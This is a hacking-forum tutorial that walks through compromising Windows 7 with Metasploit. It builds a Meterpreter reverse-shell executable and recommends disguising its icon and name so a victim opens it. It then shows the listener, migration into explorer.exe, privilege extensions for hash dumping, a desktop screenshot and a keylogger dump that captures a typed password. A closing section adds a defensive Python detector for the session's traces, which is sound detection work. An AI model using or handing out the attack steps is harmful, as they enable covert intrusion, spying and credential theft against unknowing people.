Welcome to NulledBlog
[Tutorial] How to Hack Windows with Metasploit, even Windows 7 [Advanced]



#1
TimeCenter
BackTrack 4 is used in this situation, but you can also use Windows if you want to. What we are going to use is Metasploit and Nmap. Just follow the steps.
Download Metasploit from this site: http://www.metasploit.com/download/ . You can use it on Windows or Linux.
Install the program.

If it is only on the local network, use your local IP address; if it is over the internet, use your WAN IP address, which you can see at http://www.whatismyip.com/

Start a terminal/shell on BackTrack.


root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=10.113.201.34,LPORT=4444
root@bt:~#
If you made the payload right, it will look like this; if it doesn't, you did it wrong. The Payload.exe file will be on your desktop.
I suggest, if you can, downloading Icon Changer 3.8 and changing the icon and naming it something more interesting; then you can easily get somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs...er_download.htm

Start Metasploit and choose your exploit and PAYLOAD. Do it like above.

root@bt:~# msfconsole

 _____
< metasploit >
 -----
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
  =[ svn r9959 updated 241 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 241 days ago.
  We recommend that you update the framework at least every other day.
  For information on updating your copy of Metasploit, please see:
  http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >  
See which options you have.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
We are going to use our local IP address this time. Do that by opening a new terminal/shell.

root@bt:~# ifconfig
eth0  Link encap:Ethernet  HWaddr 00:0c:29:32:56:46
    inet addr:10.113.201.34  Bcast:10.113.201.255  Mask:255.255.255.0
    inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
    RX packets:43 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:5370 (5.3 KB)  TX bytes:1152 (1.1 KB)
    Interrupt:19 Base address:0x2000
Let's start inserting our IP and port. Let's get back to Metasploit.

msf exploit(handler) > set LHOST 10.113.201.34
LHOST => 10.113.201.34
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
Make someone open the Payload.exe. I recommend downloading Icon Changer 3.8 to change the Payload.exe icon and rename it; then you can send it to somebody. After they open the file, it will look like this.

[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 10.113.201.59
[*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200

meterpreter > 
We are going to migrate to explorer.exe now. Type ps to see the target's services.
meterpreter > ps

Process list
============

 PID   Name    Arch  Session  User  Path
 ---   ----    ----  -------  ----  ----
 0  [System Process]
 4  System
 356   smss.exe
 444   csrss.exe
 508   wininit.exe
 520   csrss.exe
 556   services.exe
 572   lsass.exe
 580   lsm.exe
 704   svchost.exe
 768   nvvsvc.exe
 808   svchost.exe
 868   svchost.exe
 900   svchost.exe
 928   svchost.exe
 1068  svchost.exe
 1144  DisplayLinkManager.exe
 1176  winlogon.exe
 1316  Smc.exe
 1400  nvvsvc.exe
 1476  svchost.exe
 1548  ccSvcHst.exe
 1708  spoolsv.exe
 1720  DisplayLinkUserAgent.exe
 1752  svchost.exe
 1992  svchost.exe
 2040  IPROSetMonitor.exe
 464   LVPrcSrv.exe
 408   mdm.exe
 940   svchost.exe
 1140  Rtvscan.exe
 1448  TeamViewer_Service.exe
 2068  UltiDevCassinWebServer2a.exe
 2144  vmware-usbarbitrator.exe
 2268  vmnat.exe
 2324  vmnetdhcp.exe
 2360  vmware-authd.exe
 2848  svchost.exe
 2916  svchost.exe
 3460  taskhost.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\system32\taskhost.exe
 3528  dwm.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\Dwm.exe
 3580  explorer.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\Explorer.EXE
 3740  DisplayLinkUI.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe
 4080  hqtray.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\hqtray.exe
 2304  SmcGui.exe    x86   1
 2084  AdobeARM.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
 2336  ccApp.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Symantec Shared\ccApp.exe
 2000  LWS.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
 3832  PWRISOVM.EXE    x86   1  SERMERSOOQ\ilin  C:\Program Files\PowerISO\PWRISOVM.EXE
 4004  PrintScreen.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
 1952  PRTG Windows GUI.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe
 1936  CUCore.exe    x86   1  SERMERSOOQ\ilin  C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe
 2540  COCIManager.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
 4784  SearchIndexer.exe
 2964  msnmsgr.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 6028  wlcomm.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Contacts\wlcomm.exe
 5944  vmplayer.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\vmplayer.exe
 5096  firefox.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\firefox.exe
 448   plugin-container.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\plugin-container.exe
 4488  vmware-vmx.exe
 5200  Payload.exe  x86   1  SERMERSOOQ\ilin  C:\Users\ilin\Desktop\Payload.exe
 5696  notepad.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\notepad.exe

meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >  
I typed use priv to open up hashdump and other things.
meterpreter > use priv
Loading extension priv...success.
Type sysinfo to see which system it is. Is it helpful?
meterpreter > sysinfo
Computer: NUUMOB0088
OS  : Windows 7 (Build 7600, ).
Arch    : x86
Language: da_DK
meterpreter >  
Take a screenshot of the target's desktop. Remember, after you take the screenshot, the file is on your desktop.
meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache

meterpreter >   
You can scan/listen to whatever the target types with this.
meterpreter > keyscan_dump
Dumping captured keystrokes...
 <LWin> rnotepad <Return> my password it Hahahahaha <Alt>  <LMenu>  <Tab>
meterpreter > 
If you don't want to wait for the host, you can just type the target's IP and port. My tutorial's link is here: https://www.nulledbl...ith-metasploit/
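From the defender's side, the session transcript above leaves two host traces worth alerting on: a binary running from a user-writable folder (C:\Users\ilin\Desktop\Payload.exe) that owns a network connection, and, after migrate 3580, explorer.exe itself holding a socket to the handler port. The following is an added example and not part of the original post: it parses a process table in the layout of the Meterpreter ps output plus a constructed netstat -ano style connection list (PIDs, paths and addresses mirror the post; the 93.184.216.34:443 row is a constructed benign browser connection) and returns the rows an analyst should look at.

```python
"""Added defensive example: spot the host-side traces of the session above."""
import re

# Constructed sample, same column layout as the Meterpreter `ps` output in the
# post: PID, name, arch, session, user, path.
PROCESSES = """\
 3580  explorer.exe  x86  1  SERMERSOOQ\\ilin  C:\\Windows\\Explorer.EXE
 5200  Payload.exe   x86  1  SERMERSOOQ\\ilin  C:\\Users\\ilin\\Desktop\\Payload.exe
 5096  firefox.exe   x86  1  SERMERSOOQ\\ilin  C:\\Program Files\\Mozilla Firefox\\firefox.exe
"""

# Constructed sample in the shape of `netstat -ano` (Windows): proto, local,
# remote, state, owning PID. Port 4444 is the handler port from the post.
CONNECTIONS = """\
  TCP    10.113.201.59:7293    10.113.201.34:4444    ESTABLISHED    5200
  TCP    10.113.201.59:50012   93.184.216.34:443     ESTABLISHED    5096
  TCP    10.113.201.59:50013   10.113.201.34:4444    ESTABLISHED    3580
"""

# Executables living here were dropped by a user, not installed by an admin.
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
# Processes that should not own outbound sockets to odd ports at all;
# `migrate 3580` in the post parks the session inside explorer.exe.
SHELL_HOSTS = {"explorer.exe", "notepad.exe", "dwm.exe", "taskhost.exe"}
WEB_PORTS = {80, 443}

def parse_processes(text):
    """Map PID -> (name, path); skips header/blank lines and rows without a path."""
    procs = {}
    for line in text.splitlines():
        f = line.split(None, 5)          # maxsplit keeps spaces inside the path
        if len(f) == 6 and f[0].isdigit():
            procs[int(f[0])] = (f[1], f[5])
    return procs

def parse_connections(text):
    """Yield (pid, remote_host, remote_port) for every TCP row."""
    for line in text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP":
            host, port = f[2].rsplit(":", 1)
            yield int(f[4]), host, int(port)

def find_suspicious(proc_text, conn_text):
    """Return (pid, name, reason) for connections worth an analyst's attention."""
    procs, hits = parse_processes(proc_text), []
    for pid, host, port in parse_connections(conn_text):
        name, path = procs.get(pid, ("?", "?"))
        if USER_WRITABLE.match(path):
            hits.append((pid, name, f"user-dropped binary connects to {host}:{port}"))
        elif name.lower() in SHELL_HOSTS and port not in WEB_PORTS:
            hits.append((pid, name, f"shell host connects to {host}:{port}; check for injected code"))
    return hits
```

The second rule matters because once the session has migrated, the path-based check no longer fires: the socket belongs to a legitimately installed explorer.exe, and only the unusual destination port gives it away.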